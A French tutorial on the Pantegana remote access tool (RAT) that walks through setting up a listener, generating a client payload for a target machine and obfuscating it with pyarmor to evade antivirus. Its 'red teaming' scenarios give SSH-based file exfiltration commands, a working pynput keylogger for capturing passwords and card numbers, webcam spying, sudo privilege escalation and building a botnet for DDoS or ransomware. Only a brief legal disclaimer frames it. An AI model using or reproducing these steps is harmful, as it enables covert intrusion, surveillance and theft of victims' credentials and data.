🐭 Utilisation de Pantegana - Guide Complet

Pantegana est un outil RAT (Remote Access Tool) avancé conçu pour permettre un contrôle précis et étendu des machines cibles. Ce tutoriel couvre toutes les étapes, de l’installation à l’exploitation avancée, dans un cadre strictement légal et contrôlé.

1️⃣ Pré-requis

2️⃣ Installation de Pantegana

Étape 1 : Télécharger Pantegana

Clonez le dépôt GitHub de Pantegana :

git clone https://github.com/Pantegana/pantegana.git

Accédez au répertoire :

cd pantegana

Étape 2 : Installer les dépendances

Assurez-vous que Python et ses bibliothèques nécessaires sont installés :


sudo apt update && sudo apt install python3 python3-pip -y
pip3 install -r requirements.txt
            

Vérifiez que toutes les dépendances sont bien installées :

pip3 list | grep 

Étape 3 : Lancer Pantegana

Pour démarrer l’interface principale de Pantegana :

python3 pantegana.py

L’interface en ligne de commande s’ouvrira avec les options disponibles.

3️⃣ Configuration de Pantegana

Étape 1 : Démarrer un serveur RAT

Configurez un serveur d’écoute pour les connexions entrantes :

python3 pantegana.py --listen --port 8080

Étape 2 : Générer un Client

Générez un fichier client pour la machine cible :


python3 pantegana.py --generate --host  --port 8080 --output client.exe
            

Obfusquez le payload pour éviter la détection par des antivirus :

pyarmor pack -e " --onefile" client.py

Transférez ce fichier sur la machine cible.

4️⃣ Utilisation de Pantegana

Étape 1 : Établir une connexion

Une fois le fichier client exécuté sur la cible, une connexion sera établie avec votre serveur RAT. Vous verrez l’hôte apparaître dans l’interface.

Étape 2 : Commandes disponibles

Pantegana offre plusieurs commandes pour interagir avec la machine cible :

5️⃣ Analyse des Connexions

Surveillez et analysez les connexions établies par Pantegana :

6️⃣ Scénarios Pratiques de Red Teaming

Scénario 1 : Exfiltration de données via un tunnel chiffré

Simulez l’exfiltration de données sensibles (par exemple, un fichier CSV contenant des logs ou des informations clients) depuis la machine cible tout en évitant la détection par les IDS/IPS.

Voici un exemple d'utilisation d'un tunnel SSH pour exfiltrer les fichiers de manière sécurisée :


        # Sur la machine cible, installer un serveur SSH si nécessaire
        sudo apt install openssh-server

                # Sur la machine d'attaque, créez un tunnel SSH pour exfiltrer les fichiers via SCP
        scp -P 22 @:/chemin/vers/fichier /chemin/local/de/sauvegarde

        # Ou utilisez rsync pour une exfiltration plus rapide et plus fiable :
        rsync -avz -e "ssh -p 22" @:/chemin/vers/fichier /chemin/local/de/sauvegarde
            

Dans ce scénario, le fichier est transféré via SSH sur un port sécurisé, rendant l’exfiltration plus difficile à détecter. L'utilisation de rsync optimise les performances de transfert.

Scénario 2 : Activation du keylogger pour la collecte d'informations sensibles

Enregistrez les frappes sur la machine cible pour capturer des informations telles que les mots de passe, numéros de carte bancaire, ou autres informations sensibles.

Voici un script Python pour démarrer un keylogger simple :


        # Install required package
        pip3 install pynput

        # Script Python pour capturer les frappes
        from pynput.keyboard import Listener

        def on_press(key):
            try:
                with open("keylog.txt", "a") as f:
                    f.write(str(key.char))
            except AttributeError:
                with open("keylog.txt", "a") as f:
                    f.write(str(key))

        with Listener(on_press=on_press) as listener:
            listener.join()
            

Ce script va enregistrer toutes les frappes dans un fichier keylog.txt. Vous pouvez l'exécuter sur la machine cible pour capturer les frappes. Ce script est simple mais efficace pour capturer des informations sensibles.

Scénario 3 : Surveillance via la webcam

Utilisez la commande de Pantegana pour activer la webcam de la machine cible et capturer des images en temps réel.

Voici comment procéder pour capturer une image avec la webcam :


        # Commande pour lister les webcams disponibles
        webcam list

        # Commande pour capturer une image de la webcam
        webcam capture --device  --output webcam_image.jpg
            

La commande webcam capture permet de prendre des images à distance, ce qui peut être utile dans le cadre d’une surveillance ciblée.

Scénario 4 : Escalade de privilèges via Sudo

Dans ce scénario, vous tentez d'exploiter une vulnérabilité dans la configuration de sudo ou dans un service ayant des privilèges élevés sur la machine cible.

Voici un exemple pour tester si l’utilisateur cible peut exécuter des commandes en tant qu’administrateur sans mot de passe :


        # Tester si l'utilisateur peut exécuter des commandes sudo sans mot de passe
        sudo -l

        # Si la commande renvoie une ligne du type "NOPASSWD: ALL", vous pouvez exécuter n'importe quelle commande avec sudo sans mot de passe
        sudo 
            

Si une telle faille est présente, vous pouvez escalader vos privilèges et exécuter des commandes administratives pour avoir un contrôle complet sur le système cible.

Scénario 5 : Créer un botnet avec Pantegana

Ce scénario montre comment utiliser Pantegana pour établir un réseau de machines compromises, permettant de les contrôler simultanément.

Après avoir généré plusieurs fichiers clients et les avoir transférés sur différentes cibles, vous pouvez utiliser l’interface Pantegana pour interagir avec toutes les machines compromises à la fois :


        # Lancer l'interface Pantegana
        python3 pantegana.py --listen --port 8080

        # Une fois la connexion établie avec plusieurs clients, vous pouvez envoyer des commandes à toutes les machines compromises en même temps
        # Exemple : capture d'écran sur toutes les machines
        screenshot
            

Ce type de botnet est utilisé pour des attaques par déni de service (DDoS), pour exfiltrer des données à grande échelle ou encore pour diffuser des ransomwares.

7️⃣ Sécurité et Légalités

⚠️ Avertissement : L’utilisation de Pantegana est strictement réservée aux tests dans des environnements autorisés. Toute utilisation non consentie ou illégale constitue une infraction sévèrement punie par la loi.